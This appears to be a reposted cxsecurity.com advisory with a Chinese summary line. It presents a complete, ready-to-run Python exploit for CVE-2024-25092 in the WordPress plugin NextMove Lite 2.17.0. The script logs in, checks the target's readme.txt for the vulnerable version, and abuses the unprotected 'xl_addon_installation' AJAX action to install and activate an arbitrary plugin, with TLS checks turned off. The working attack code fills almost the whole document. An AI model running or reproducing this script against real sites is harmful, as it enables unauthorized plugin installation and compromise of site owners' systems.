该文章提供了一个Python脚本,用于利用WordPress插件NextMove Lite 2.17.0中的漏洞(CVE-2024-25092),通过登录、检查版本和上传恶意插件来实现攻击。 2025-3-13 17:51:14 Author: cxsecurity.com(查看原文) 阅读量:42 收藏
WordPress NextMove Lite 2.17.0 Missing Authorization
import requests import argparse #Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi. def login(session, url, username, password, user_agent): login_url = url + '/wp-login.php' response = session.post(login_url, verify=False, data={ 'log': username, 'pwd': password, 'rememberme': 'forever', 'wp-submit': 'Log+In' }, headers={"User-Agent": user_agent}) if any('wordpress_logged_in' in cookie.name for cookie in session.cookies): print("Logged in successfully.") else: print("Failed to log in.") exit() def check_version(session, url, user_agent): version_url = url + '/wp-content/plugins/woo-thank-you-page-nextmove-lite/readme.txt' response = session.get(version_url, verify=False, headers={"User-Agent": user_agent}) if response.status_code == 200: if 'Stable tag: 2.17.0' in response.text: print("Site is vulnerable... Exploiting and uploading plugin") else: print("Site is not vulnerable.") exit() else: print("Failed to check version.") exit() def install_plugin(session, url, plugin, user_agent): exploit_url = url + '/wp-admin/admin-ajax.php' exploit_data = { 'action': 'xl_addon_installation', 'xl_slug': plugin, 'xl_file': '/plugin.php' } headers = { "User-Agent": user_agent, "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Referer": url + '/wp-admin/admin.php?page=xl-cart', "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": url, "Connection": "keep-alive", "Cookie": '; '.join([f"{cookie.name}={cookie.value}" for cookie in session.cookies]) } response = session.post(exploit_url, data=exploit_data, headers=headers, verify=False) if response.status_code == 200: print(f"Plugin '{plugin}' installed and activated successfully.") else: print("Failed to upload plugin.") def main(): parser = argparse.ArgumentParser(description='Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi. ') parser.add_argument('-u', '--url', required=True, help='Target URL') parser.add_argument('-un', '--username', required=True, help='Username') parser.add_argument('-p', '--password', required=True, help='Password') parser.add_argument('-pl', '--plugin', default='cart-for-woocommerce', help='Plugin to install (default: cart-for-woocommerce)') args = parser.parse_args() user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" requests.packages.urllib3.disable_warnings() session = requests.Session() session.verify = False login(session, args.url, args.username, args.password, user_agent) check_version(session, args.url, user_agent) install_plugin(session, args.url, args.plugin, user_agent) if __name__ == "__main__": main()
References:
https://github.com/Nxploited/CVE-2024-25092/blob/main/CVE-2024-25092.py
Thanks for you comment!
Your message is in quarantine 48 hours.
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
如有侵权请联系:admin#unsafe.sh